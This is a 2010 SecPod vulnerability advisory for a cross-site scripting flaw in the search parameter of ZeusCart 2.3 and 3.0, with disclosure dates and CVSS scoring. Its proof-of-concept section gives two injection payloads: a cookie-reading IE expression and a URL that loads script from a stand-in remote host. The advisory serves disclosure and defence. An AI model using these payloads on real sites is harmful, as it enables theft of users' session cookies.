#######################################################################
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability

SecPod Technologies (www.secpod.com)
Author Sooraj K.S
#######################################################################

SecPod ID:  1003      07/28/2010 Issue Discovered
                07/30/2010 Vendor Notified
                No Response from Vendor

Class: Cross-Site Scripting    Severity: Medium


Overview:
---------
ZeusCart Ecommerce Shopping Cart Software is prone to cross-site scripting
vulnerability.

Technical Description:
----------------------
ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability because it fails to properly sanitize user-supplied input.

Input passed via the 'search' parameter in a 'search' action in index.php is
not properly verified before it is returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site. This may allow the attacker to steal cookie-based
authentication credentials and to launch other attacks.

The vulnerability has been tested in ZeusCart 3.0 and 2.3. Other versions may
also be affected.
 

Impact:
--------
Successful exploitation allows an attacker to execute arbitrary HTML and script
code in a user's browser session in the context of a vulnerable site.


Affected Software:
------------------
ZeusCart 3.0
ZeusCart 2.3

Tested on,
ZeusCart 3.0 and 2.3 (tested using Microsoft Internet Explorer browser)


Reference:
---------
http://www.zeuscart.com/
http://secpod.org/blog/?p=109
http://secpod.org/advisories/SECPOD_ZeusCart_XSS.txt


Proof of Concept:
-----------------
1)Input this code in search box and click search
'"%22%20style=x:expression(alert(document.cookie))><"
This script executed only on Microsoft Internet Explorer browser when tested
on ZeusCart 3.0 and 2.3

2) This example worked on ZeusCart version 2.3
http://www.example.com/?do=search&search='"><SCRIPT SRC=//REMOTE_SITE_SCRIPT>

Solution:
----------
Fix not available

Risk Factor:
-------------
    CVSS Score Report: 
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = MEDIUM
        AUTHENTICATION         = NONE
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = PARTIAL
        AVAILABILITY_IMPACT    = NONE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Credits:
--------
Sooraj K.S of SecPod Technologies has been credited with the discovery of this
vulnerability.